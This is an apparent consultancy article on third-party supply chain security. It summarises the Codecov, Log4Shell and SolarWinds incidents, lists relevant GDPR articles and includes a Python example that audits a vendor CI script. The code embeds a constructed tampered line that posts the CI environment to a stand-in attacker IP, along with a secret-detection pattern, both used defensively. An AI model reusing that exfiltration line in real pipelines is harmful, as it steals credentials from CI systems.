
Prevent data breaches and financial losses with proactive third-party vendor security measures

Supply chain attacks are a serious threat to organisations of all sizes. Instead of attacking a business directly, the attacker targets the companies that provide it with software, hardware or services, because a single compromised supplier gives access to every customer that trusts it. Once attackers control a supplier's system, build pipeline or update channel, they can use that trust to steal sensitive data or to deliver malware into the target company's environment. Several tactics are common in this type of attack:

Social engineering: This involves tricking employees or suppliers into giving up sensitive information or clicking on malicious links.

Zero-day exploits: These are vulnerabilities in software that the software vendor is not aware of and that have not yet been fixed.

Supply chain manipulation: This involves modifying or tampering with software or hardware components during the manufacturing or distribution process.

Some examples

Codecov supply chain attack (disclosed April 2021)

  • Targeted company: Codecov, a provider of code-coverage reporting that runs inside customers' continuous integration and continuous delivery (CI/CD) pipelines.
  • Third-party involved: Attackers used a credential exposed by an error in Codecov's Docker image creation process to modify the Bash Uploader script that customers download and execute in their CI jobs. The tampered script was live from late January 2021 until it was detected on 1 April 2021.
  • Malicious uploader: The added code sent the environment variables of each CI run, which commonly contain tokens, API keys and other credentials, to an attacker-controlled server, giving the attackers a foothold in the systems of organisations that used Codecov.

Log4Shell in VMware products (December 2021)

  • Targeted component: Apache Log4j 2, an open-source Java logging library embedded in a large number of vendor products, including several from VMware.
  • Vulnerability: CVE-2021-44228 ("Log4Shell") allowed unauthenticated remote code execution through a JNDI lookup triggered by an attacker-supplied string in a logged value.
  • Impact: Because the flaw sat in a shared component rather than in VMware's own code, products such as VMware Horizon and vCenter Server were exposed until VMware shipped fixes (VMSA-2021-0028). Internet-facing Horizon servers were actively exploited to deploy backdoors in the months that followed, showing that a vulnerable library inherited from a supplier is as dangerous as a deliberately planted one.

SolarWinds Orion attack (December 2020)

  • Targeted company: SolarWinds, a software company that develops IT management tools.
  • Third-party involved: The attackers compromised SolarWinds' build process and inserted the SUNBURST backdoor into digitally signed updates of the Orion platform. Around 18,000 customers downloaded the trojanised update, and the attackers then selected a smaller set of high-value victims, including US government agencies and Fortune 500 companies, for follow-on intrusion.

Reference: supply chain security in the GDPR

The following GDPR articles bear on supply chain security:

Article 28: This article governs the use of processors. A controller may only use processors that provide sufficient guarantees of appropriate technical and organisational measures, and the relationship must be set out in a contract. This is the legal basis for the vendor contracts discussed below.

Article 32: This article requires controllers and processors to implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk, including pseudonymisation and encryption.

Article 33: This article mandates that data controllers notify the supervisory authority within 72 hours of becoming aware of a personal data breach unless the breach is unlikely to result in a risk to the rights and freedoms of individuals. It also requires a processor to notify the controller without undue delay after becoming aware of a breach, which is why a compromised vendor's notification obligations should be spelled out in the contract.

Article 34: This article requires data controllers to notify data subjects of a personal data breach without undue delay unless the breach is unlikely to result in a high risk to the rights and freedoms of individuals.

To protect against supply chain attacks, businesses can take the following steps:

Perform thorough due diligence on vendors: This includes assessing their security practices and background. A structured security questionnaire, backed where possible by evidence such as audit reports or certifications, will help you understand your vendor's security posture.

Implement supply chain visibility: This means knowing which third-party components, scripts and services your systems depend on (for example by maintaining a software bill of materials), verifying the integrity of what you download from vendors, and monitoring where sensitive data flows throughout the supply chain.

Proactively identify and patch vulnerabilities: This includes using vulnerability scanning tools to find vulnerable components, including those embedded in vendor products, and applying vendor patches promptly.

Educate employees on cybersecurity best practices: This includes training them to identify and report suspicious activity.

Develop an incident response plan: This plan should outline how the organisation will respond to and recover from a supply chain attack.
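The Codecov incident above shows why "implement supply chain visibility" has to include verifying what you actually download from a vendor. The following added example (not AdviceBytes code, and not the real Codecov uploader) shows the two controls a CI job can apply before executing a vendor-supplied script: a pinned SHA-256 digest, which is the primary control, and a heuristic scan for lines that ship environment variables to an unexpected host, which is a secondary signal. The script bodies, the host name uploader.example.com and the attacker address 203.0.113.10 are constructed for illustration.

```python
"""Integrity and behaviour checks for a vendor-supplied CI script.

Added example; not code from AdviceBytes or from any vendor. The sample
script bodies below are constructed, and the pinned digest is computed
from the clean sample so the example runs offline.
"""
import hashlib
import hmac
import re

# Constructed stand-in for a vendor-hosted uploader script. In practice the
# expected digest comes from the vendor's release notes or a signed checksum
# file and is stored in your own repository, never fetched next to the script.
CLEAN_SCRIPT = b"""#!/usr/bin/env bash
set -euo pipefail
report="${1:-coverage.xml}"
curl -sS -X POST --data-binary @"$report" https://uploader.example.com/v1/upload
"""

# The same script with one appended line, modelled on the kind of change seen
# in the Codecov incident: dump the CI environment to an attacker-controlled host.
TAMPERED_SCRIPT = CLEAN_SCRIPT + b"""curl -sm 0.5 -d "$(env)" http://203.0.113.10/upload
"""

# Pinned at "release" time from the known-good copy (assumption for the example).
PINNED_SHA256 = hashlib.sha256(CLEAN_SCRIPT).hexdigest()

# Hosts the script is allowed to contact; anything else is suspicious.
ALLOWED_HOSTS = {"uploader.example.com"}

_URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")
# Patterns that indicate the whole environment or named secrets are being read.
_SECRET_RE = re.compile(
    r"\$\(env\)|\$\(printenv\)|\benv\b\s*\||\$\{?[A-Z_]*(TOKEN|SECRET|KEY)[A-Z_]*\}?"
)


def verify_digest(content: bytes, expected_hex: str) -> bool:
    """True if content hashes to the pinned SHA-256 (constant-time comparison)."""
    actual = hashlib.sha256(content).hexdigest()
    return hmac.compare_digest(actual, expected_hex)


def find_suspicious_lines(content: bytes) -> list:
    """Return (line number, line, unexpected hosts, reads secrets) for each hit.

    Heuristic only: obfuscated code will slip past it, which is why the digest
    check is the primary control and this is a secondary signal.
    """
    findings = []
    for lineno, line in enumerate(content.decode("utf-8", "replace").splitlines(), 1):
        unexpected = set(_URL_RE.findall(line)) - ALLOWED_HOSTS
        leaks_env = bool(_SECRET_RE.search(line))
        if unexpected or leaks_env:
            findings.append((lineno, line.strip(), sorted(unexpected), leaks_env))
    return findings


def audit_vendor_script(content: bytes, expected_hex: str = PINNED_SHA256) -> dict:
    """Combine both checks into a verdict a CI job can act on before running it."""
    digest_ok = verify_digest(content, expected_hex)
    findings = find_suspicious_lines(content)
    return {
        "digest_ok": digest_ok,
        "findings": findings,
        "safe_to_run": digest_ok and not findings,
    }


if __name__ == "__main__":
    for name, script in (("clean", CLEAN_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(name, audit_vendor_script(script))
```

In a real pipeline the digest check alone should block execution; the heuristic scan is there to give responders a readable reason when a vendor rotates a script without publishing a new checksum, which is exactly the moment a silent modification would otherwise be waved through.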

At AdviceBytes, we conduct a thorough assessment of third-party suppliers and vendors and provide guidance to address the associated risks. 

One of the first things we check is whether a legal and contractual agreement with each third-party supplier is in place, covering security obligations and breach notification.

"Protect your business's reputation and integrity with vigilant third-party vendor security checks."
